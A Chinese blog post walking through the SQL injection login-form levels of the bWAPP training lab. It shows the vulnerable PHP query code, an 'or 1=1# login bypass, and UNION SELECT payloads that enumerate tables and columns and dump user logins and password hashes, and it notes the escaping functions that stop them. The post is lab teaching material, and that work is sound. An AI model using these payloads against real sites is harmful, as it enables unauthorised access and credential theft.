bWAPP-SQLInjection-LoginForm

最新推荐文章于 2025-03-01 08:27:32 发布
最新推荐文章于 2025-03-01 08:27:32 发布
阅读量706 收藏 1
点赞数 1
分类专栏: bWAPP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/108719763
版权

表单注入

代码分析

//==============同时对输入字段进行消毒,查询================
<?php

    if(isset($_POST["form"]))   //===========获取提交的表单信息===============
    {

        $login = $_POST["login"];
        $login = sqli($login);

        $password = $_POST["password"];
        $password = sqli($password);
		//==================使用自定义的sqli()函数进行消毒================
        $sql = "SELECT * FROM heroes WHERE login = '" . $login . "' AND password = '" . $password . "'";
        // echo $sql;
       $recordset = mysql_query($sql, $link);
?>

演练

Login Form/Hero–low

bee 'or 1=1#
1

在这里插入图片描述

Login Form/Hero–mid/high

使用 addslashes(),mysql_real_escape_string() 无法绕过

function sqli_check_1($data)
{
   
    return addslashes($data);
    // 语法 addslashes ( string $str ) : string
    // 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。
    // 这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。
    
}

function sqli_check_2($data)
{
    return mysql_real_escape_string($data);
    // 面向对象风格
    // mysqli::escape_string ( string $escapestr ) : string
    // mysqli::real_escape_string ( string $escapestr ) : string
    // 过程化风格
    // mysqli_real_escape_string ( mysqli $link , string $escapestr ) : string
    // 此函数用来对字符串中的特殊字符进行转义, 以使得这个字符串是一个合法的 SQL 语句。
    // 传入的字符串会根据当前连接的字符集进行转义,得到一个编码后的合法的 SQL 语句。
}

Login Form/User–low

//==先通过用户名查询用户信息(如果存在),就提取出查到的信息中的用户密码,再与用户输入的密码进行匹配==

<?php
    if(isset($_POST["form"]))
    {
        $login = $_POST["login"];
        $login = sqli($login);
        $password = $_POST["password"];
        $password = sqli($password);
        $password = hash("sha1", $password, false);
   		//=============hash加密,方便与后面获取的密码进行匹配比对=======
        $sql = "SELECT * FROM users WHERE login = '" . $login . "'";
        $recordset = mysql_query($sql, $link);  
        if(!$recordset)					//===========先判断用户是否存在
        {
            die("Error: " . mysql_error());
        }
        else
        {
            $row = mysql_fetch_array($recordset); 
            
//==========!!!逐行获取查询获得到的信息,row位数组,通过字段下标获取值,进行匹配!!!========
            
            if($row["login"] && $password == $row["password"]) //====用户名,密码匹配
            {
                // $message = "<font color=\"green\">Welcome " . ucwords($row["login"]) . "...</font>";
                $message =  "<p>Welcome <b>" . ucwords($row["login"]) . "</b>, how are you today?</p><p>Your secret: <b>" . ucwords($row["secret"]) . "</b></p>";
                // $message = $row["login"];

            }

            else
            {

                $message = "<font color=\"red\">Invalid credentials!</font>";

            }

        }

        mysql_close($link);

    }
    echo $message;
?>

因为对密码进行的hash加密,使得输入的密码会被编码位字符串,无法获得注入效果

发现存在$sql = "SELECT * FROM users WHERE login = '" . $login . "'";语句,可以使用union 进行联合查询

' union select 1,2,3,4,5,6,7,8 #
' union select 1,2,3,4,5,6,7,8,9 #

在这里插入图片描述
在这里插入图片描述

此处得知道password 字段的在可利用字段的位置(此处为位置3)

注意此处的sha1加密的字符串必须为填入的密码的加密结果

' union select 1,2,"6885858486f31043e5839c735d99457f045affd0",4,5,6,7,8,9 # 
bug

在这里插入图片描述

sha1在线加密

  1. 获取表名
' union select 1,2,"6885858486f31043e5839c735d99457f045affd0",4,(select group_concat(table_name) from information_schema.tables where table_schema=database()),6,7,8,9 # 

bug

在这里插入图片描述

  1. 获取列名

    ' union select 1,2,"6885858486f31043e5839c735d99457f045affd0",4,(select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema=database()),6,7,8,9 # 

bug

在这里插入图片描述

  1. 获取信息

    ' union select 1,2,"6885858486f31043e5839c735d99457f045affd0",4,(select group_concat(login,'-',password,'-') from users),6,7,8,9 # 

bug

在这里插入图片描述

Login Form/User–mid/high

分别用了addslashes()和mysql_real_escape_string()函数防御,

sers),6,7,8,9 #

bug


[外链图片转存中...(img-39NjtdKo-1600695174065)]

### Login Form/User--mid/high

分别用了addslashes()和mysql_real_escape_string()函数防御,

且在mysql编码为utf-8, 无法用宽字节绕过, 安全。
DVWA通关--SQL注入(SQL Injection)
箭雨镜屋
01-26 1万+
LOW 通关步骤 1、找闭合 输入1' 报错 输入1'',不报错,说明闭合是单引号 2、确定列数 输入1' order by 2#,返回正确结果 输入1' order by 3#,报错,说明只有两列 3、 sql注入时union出错(Illegal mix of collations for operation UNION) 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析 总结 ...
SQL Injection
做最好的自己
03-12 1718
SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements s
“Web渗透测试实战指南|BWAPP靶场全关卡通关教程(含高中低/不可能级别)从SQL注入到XSS攻击手把手教学|网络安全工程师必备技能“ 内容较长点赞收藏哟
最新发布
浩策盾悟
03-01 6089
未验证的重定向和转发漏洞(Unvalidated Redirects & Forwards)是由于缺乏适当的用户输入验证,导致用户被恶意重定向到攻击者控制的站点。通过适当的输入验证、白名单控制和避免使用用户提供的 URL 进行重定向,可以有效防止此类漏洞。bWAPP 中通过手动修改 URL 参数来模拟攻击,帮助我们理解这种漏洞的实际应用。
Web安全相关(五):SQL注入(SQL Injection)
weixin_30596023的博客
05-21 318
简介   SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了...
sql injection(sql 注入)
逍遥绝情的博客
05-24 3813
前言当一个攻击者通过在查询语句中插入一系列的SQL语句来将数据写入到应用程序中,这种方法就可以定义成SQL注入。 SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 1081
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
MY-LoginForm.zip_android
09-23
《Android应用:My LoginForm源码解析》 在移动开发领域,Android平台因其开源特性与广泛的应用,成为开发者的重要选择。本篇文章将详细解读名为“MY-LoginForm.zip”的压缩包文件,其中包含了“LoginForm”这一...
LoginForm-using-SharedPrefences:这是一个简单的 PHP 登录表单
06-12
标题中的“LoginForm-using-SharedPrefences”表明这是一个关于在Android应用中实现登录功能的项目,它利用了SharedPreferences这一持久化存储机制。SharedPreferences是Android系统提供的一种轻量级的数据存储方式...
CristianRuizBlog-LoginForm:HTML和Bootstrap 4登录表单
05-14
总结来说,"CristianRuizBlog-LoginForm"项目展示了一个基于HTML和Bootstrap 4的登录表单设计,这个表单不仅可以提供美观的用户界面,还可以与Spring Security框架无缝集成,实现完整的用户认证流程。理解这些技术...
Simple-CSharp-LoginForm:C#实现的MySQL登录注册教程
- 它使用结构化查询语言(SQL)进行数据库管理,支持多用户使用和并发控制。 - 在C#应用程序中使用MySQL,通常需要使用MySQL Connector/NET(MySql.Data.dll),这是一个允许C#应用程序连接和操作MySQL数据库的...
Vaadin应用程序模板:loginform-test快速上手指南
资源摘要信息:"loginform-test:用于演示目的" 知识点: 1. Vaadin框架:Vaadin是一个用于构建现代Web应用程序的Java框架。它允许开发者通过编写Java代码来创建丰富的用户界面,而无需直接编写HTML和JavaScript。...
SQL injection详解
博学之,审问之,慎思之,明辨之,笃行之
03-14 432
[quote] 1. SQL injection可以说是一种漏洞,也可以说成是一种攻击方法,程序中的变量处理不当,对用户提交的数据过滤不足,都可能产生这个漏洞,而攻击原理就是利用用户提交或可修改的数据,把想要的SQL语句插入到系统实际SQL语句中,轻则获得敏感的信息,重则控制服务器。SQL injection并不紧紧局限在Mssql数据库中,Access、Mysql、Oracle、Sybase都...
sql injection
钱可通神
11-28 639
[转载]翻译文章sql injection攻击实例(原文链接 http://ddbiz.com/?p=222) 文章翻译:blcakwell (plmm:) 我的一个客户要求我们检查一下给他们的职员和顾客用的内网(企业网)。 这也是大范围安全检测的一部分。尽管对于sql注入的一般概念比较熟悉, 实际上,我们以前没有用过这种方法渗透网络。这次我们完全成功 的进行了渗透,我希望把过程
bwapp通关(全完结)
热门推荐
hxhxhxhxx的博客
10-20 2万+
bwapp/ A1 - Injection /HTML Injection - Reflected (GET)HTML Injection - Reflected (POST)HTML Injection - Reflected (Current URL)HTML Injection - Stored (Blog)iFrame InjectionLDAP Injection (Search)【待开化】 ---------------------- bWAPP v2.2 -----------------
BWAPPSQL注入通关
qq_43665434的博客
04-17 3188
1、SQL injection(GET/search) low 输入单引号直接报错,说明有注入点 直接order by二分法得出主查询字段数为7 直接union注入,测出回显点为2,3,4,5 查数据库信息: 测出数据库名为bwapp,用户为root,版本为5.5.53 查询表名: 查询字段名: 查字段值: 没有难度。 medium 尝试多种方法都不行,看了一眼源码: 发现是用addslashes()进行转义的,尝试了下宽字节绕过,也不行。 看了下原来数据库采用的是urf8编码,本来想改成g..
bWAPPSQL注入思路
qq_37019068的博客
10-09 1473
bWAPPSQL注入思路 SQL Injection (GET/Search) 等级:low 首先看看正常搜索的情况,这里我输入了一个字母b,可以看出来他把标题带有b的电影信息全都给搜出来了 在这里我猜想其构成SQL语句的代码: $sql = "select * from table where Title like '%" . $name . "%'" 接下来为了验证猜想,我输入了一个单引号 返回了一个报错,直接证明了服务器未对单引号进行过滤,意味着我们可以使用单引号进行SQL语句的闭合控制,且也
bwapp通关攻略
m0_65150886的博客
09-09 967
alert('价格')
bwapp靶场 sql low
m0_74394274的博客
09-20 464
title=1 在输入框写payload别执行下面会爆数据(也可以抓一个bWAPP/sqli_10-2.php?title=1 的包直接写payload)通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行实时更新。只给报错信息没有别的信息我们试试updatexml函数。就是多了一个验证码进去后都一样。抓个包看看,判断出有4个字段。
[ASP开发][入侵检测]浅谈SQL注入式(SQL injection)攻击与防范
ChneChen的Blog
03-02 2101
(http://www.cnhacker.cn/asp/list.asp?id=2184)我没有系统的学习过asp或者php编程,也没有系统的学习过access、sqlserver、mysql等数据库,所以我不是一个程序员,虽然经常干一些类似程序员的事情。    因为要建立自己的站点,3次改版下来,多少也写了几千行程序,加上对一些论坛、留言板、文章发布系统的测试,也发现了一些问题,现在与大家探
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值